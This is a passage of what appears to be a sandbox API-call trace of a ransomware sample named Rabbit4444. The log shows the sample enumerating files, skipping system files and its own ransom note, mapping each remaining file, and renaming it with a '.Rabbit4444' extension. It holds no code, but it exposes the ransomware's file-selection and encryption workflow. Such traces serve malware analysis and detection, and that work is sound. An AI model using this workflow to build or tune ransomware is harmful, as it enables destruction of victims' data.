GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0068.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0068.349] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.350] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0068.351] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0068.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.351] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0068.351] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.351] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0068.351] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15966212287) returned 1 [0068.351] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0068.351] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0068.351] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.352] CloseHandle (hObject=0x29c) returned 1 [0068.352] CloseHandle (hObject=0x280) returned 1 [0068.352] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}.Rabbit4444") returned 156 [0068.352] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{bceb7afa-8a96-4ee0-a2df-1a462f84c0b8}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{BCEB7AFA-8A96-4EE0-A2DF-1A462F84C0B8}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{bceb7afa-8a96-4ee0-a2df-1a462f84c0b8}.rabbit4444"), dwFlags=0x1) returned 1 [0068.353] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cd356a6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9cd356a6, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", cAlternateFileName="{C4D5A~1")) returned 1 [0068.353] lstrcmpiW (lpString1="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.353] lstrcmpiW (lpString1="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.353] lstrcmpiW (lpString1="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", lpString2="Rabbit4444.exe") returned -1 [0068.353] lstrcmpiW (lpString1="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", lpString2=".") returned 1 [0068.353] lstrcmpiW (lpString1="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", lpString2="..") returned 1 [0068.353] lstrcmpiW (lpString1="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", lpString2="windows") returned -1 [0068.353] lstrcmpiW (lpString1="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", lpString2="bootmgr") returned -1 [0068.353] lstrcmpiW (lpString1="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", lpString2="pagefile.sys") returned -1 [0068.353] lstrcmpiW (lpString1="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", lpString2="boot") returned -1 [0068.353] lstrcmpiW (lpString1="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", lpString2="ids.txt") returned -1 [0068.353] lstrcmpiW (lpString1="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", lpString2="NTUSER.DAT") returned -1 [0068.353] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}" | out: lpString1="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}") returned="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}" [0068.353] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}", dwFileAttributes=0x0) returned 1 [0068.354] lstrlenW (lpString="{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}") returned 38 [0068.354] lstrlenW (lpString="Rabbit4444") returned 10 [0068.354] lstrcmpiW (lpString1="ED53BF3F7}", lpString2="Rabbit4444") returned -1 [0068.354] lstrlenW (lpString=".dll") returned 4 [0068.354] lstrcmpiW (lpString1="3F7}", lpString2=".dll") returned 1 [0068.354] lstrlenW (lpString=".lnk") returned 4 [0068.354] lstrcmpiW (lpString1="3F7}", lpString2=".lnk") returned 1 [0068.354] lstrlenW (lpString=".ini") returned 4 [0068.354] lstrcmpiW (lpString1="3F7}", lpString2=".ini") returned 1 [0068.354] lstrlenW (lpString=".sys") returned 4 [0068.354] lstrcmpiW (lpString1="3F7}", lpString2=".sys") returned 1 [0068.354] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c4d5ae10-76af-425b-81aa-7aeed53bf3f7}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.354] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.354] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15966519315) returned 1 [0068.354] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.355] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0068.355] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0068.355] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.356] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0068.357] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0068.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.357] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0068.357] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.357] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0068.357] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15966786348) returned 1 [0068.357] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0068.357] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0068.357] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.357] CloseHandle (hObject=0x29c) returned 1 [0068.357] CloseHandle (hObject=0x280) returned 1 [0068.357] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}.Rabbit4444") returned 156 [0068.358] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c4d5ae10-76af-425b-81aa-7aeed53bf3f7}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C4D5AE10-76AF-425B-81AA-7AEED53BF3F7}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c4d5ae10-76af-425b-81aa-7aeed53bf3f7}.rabbit4444"), dwFlags=0x1) returned 1 [0068.358] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c205a4c, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c205a4c, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", cAlternateFileName="{C4F78~1")) returned 1 [0068.358] lstrcmpiW (lpString1="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.358] lstrcmpiW (lpString1="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.358] lstrcmpiW (lpString1="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", lpString2="Rabbit4444.exe") returned -1 [0068.358] lstrcmpiW (lpString1="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", lpString2=".") returned 1 [0068.358] lstrcmpiW (lpString1="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", lpString2="..") returned 1 [0068.358] lstrcmpiW (lpString1="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", lpString2="windows") returned -1 [0068.358] lstrcmpiW (lpString1="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", lpString2="bootmgr") returned -1 [0068.359] lstrcmpiW (lpString1="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", lpString2="pagefile.sys") returned -1 [0068.359] lstrcmpiW (lpString1="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", lpString2="boot") returned -1 [0068.359] lstrcmpiW (lpString1="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", lpString2="ids.txt") returned -1 [0068.359] lstrcmpiW (lpString1="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", lpString2="NTUSER.DAT") returned -1 [0068.359] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}" | out: lpString1="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}") returned="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}" [0068.359] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}", dwFileAttributes=0x0) returned 1 [0068.359] lstrlenW (lpString="{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}") returned 38 [0068.359] lstrlenW (lpString="Rabbit4444") returned 10 [0068.359] lstrcmpiW (lpString1="B6FAE5D46}", lpString2="Rabbit4444") returned -1 [0068.359] lstrlenW (lpString=".dll") returned 4 [0068.359] lstrcmpiW (lpString1="D46}", lpString2=".dll") returned 1 [0068.359] lstrlenW (lpString=".lnk") returned 4 [0068.359] lstrcmpiW (lpString1="D46}", lpString2=".lnk") returned 1 [0068.359] lstrlenW (lpString=".ini") returned 4 [0068.359] lstrcmpiW (lpString1="D46}", lpString2=".ini") returned 1 [0068.359] lstrlenW (lpString=".sys") returned 4 [0068.359] lstrcmpiW (lpString1="D46}", lpString2=".sys") returned 1 [0068.359] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c4f78a21-2302-4caa-90bc-87db6fae5d46}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.360] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.360] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15967034220) returned 1 [0068.360] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.360] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0068.360] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0068.360] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.361] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0068.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0068.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0068.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0068.362] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15967318779) returned 1 [0068.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0068.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0068.363] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.363] CloseHandle (hObject=0x29c) returned 1 [0068.363] CloseHandle (hObject=0x280) returned 1 [0068.363] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}.Rabbit4444") returned 156 [0068.363] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c4f78a21-2302-4caa-90bc-87db6fae5d46}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C4F78A21-2302-4CAA-90BC-87DB6FAE5D46}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c4f78a21-2302-4caa-90bc-87db6fae5d46}.rabbit4444"), dwFlags=0x1) returned 1 [0068.364] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c2c45dd, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c2c45dd, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", cAlternateFileName="{C6A43~1")) returned 1 [0068.364] lstrcmpiW (lpString1="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.365] lstrcmpiW (lpString1="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.365] lstrcmpiW (lpString1="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", lpString2="Rabbit4444.exe") returned -1 [0068.365] lstrcmpiW (lpString1="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", lpString2=".") returned 1 [0068.365] lstrcmpiW (lpString1="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", lpString2="..") returned 1 [0068.365] lstrcmpiW (lpString1="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", lpString2="windows") returned -1 [0068.365] lstrcmpiW (lpString1="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", lpString2="bootmgr") returned -1 [0068.365] lstrcmpiW (lpString1="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", lpString2="pagefile.sys") returned -1 [0068.365] lstrcmpiW (lpString1="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", lpString2="boot") returned -1 [0068.365] lstrcmpiW (lpString1="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", lpString2="ids.txt") returned -1 [0068.365] lstrcmpiW (lpString1="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", lpString2="NTUSER.DAT") returned -1 [0068.365] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}" | out: lpString1="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}") returned="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}" [0068.365] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}", dwFileAttributes=0x0) returned 1 [0068.365] lstrlenW (lpString="{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}") returned 38 [0068.365] lstrlenW (lpString="Rabbit4444") returned 10 [0068.365] lstrcmpiW (lpString1="D6F9781A8}", lpString2="Rabbit4444") returned -1 [0068.365] lstrlenW (lpString=".dll") returned 4 [0068.365] lstrcmpiW (lpString1="1A8}", lpString2=".dll") returned 1 [0068.365] lstrlenW (lpString=".lnk") returned 4 [0068.365] lstrcmpiW (lpString1="1A8}", lpString2=".lnk") returned 1 [0068.365] lstrlenW (lpString=".ini") returned 4 [0068.365] lstrcmpiW (lpString1="1A8}", lpString2=".ini") returned 1 [0068.365] lstrlenW (lpString=".sys") returned 4 [0068.365] lstrcmpiW (lpString1="1A8}", lpString2=".sys") returned 1 [0068.365] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c6a43e66-7b5a-4590-a7f3-a33d6f9781a8}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.366] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.366] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15967657001) returned 1 [0068.366] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0068.366] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0068.366] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.367] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0068.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0068.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.368] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.368] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15967920420) returned 1 [0068.369] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0068.369] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0068.369] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.369] CloseHandle (hObject=0x29c) returned 1 [0068.369] CloseHandle (hObject=0x280) returned 1 [0068.369] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}.Rabbit4444") returned 156 [0068.369] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c6a43e66-7b5a-4590-a7f3-a33d6f9781a8}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C6A43E66-7B5A-4590-A7F3-A33D6F9781A8}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c6a43e66-7b5a-4590-a7f3-a33d6f9781a8}.rabbit4444"), dwFlags=0x1) returned 1 [0068.370] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bc822f4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9bc822f4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", cAlternateFileName="{C6D1D~1")) returned 1 [0068.370] lstrcmpiW (lpString1="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.370] lstrcmpiW (lpString1="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.370] lstrcmpiW (lpString1="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", lpString2="Rabbit4444.exe") returned -1 [0068.370] lstrcmpiW (lpString1="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", lpString2=".") returned 1 [0068.370] lstrcmpiW (lpString1="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", lpString2="..") returned 1 [0068.370] lstrcmpiW (lpString1="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", lpString2="windows") returned -1 [0068.370] lstrcmpiW (lpString1="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", lpString2="bootmgr") returned -1 [0068.370] lstrcmpiW (lpString1="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", lpString2="pagefile.sys") returned -1 [0068.370] lstrcmpiW (lpString1="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", lpString2="boot") returned -1 [0068.370] lstrcmpiW 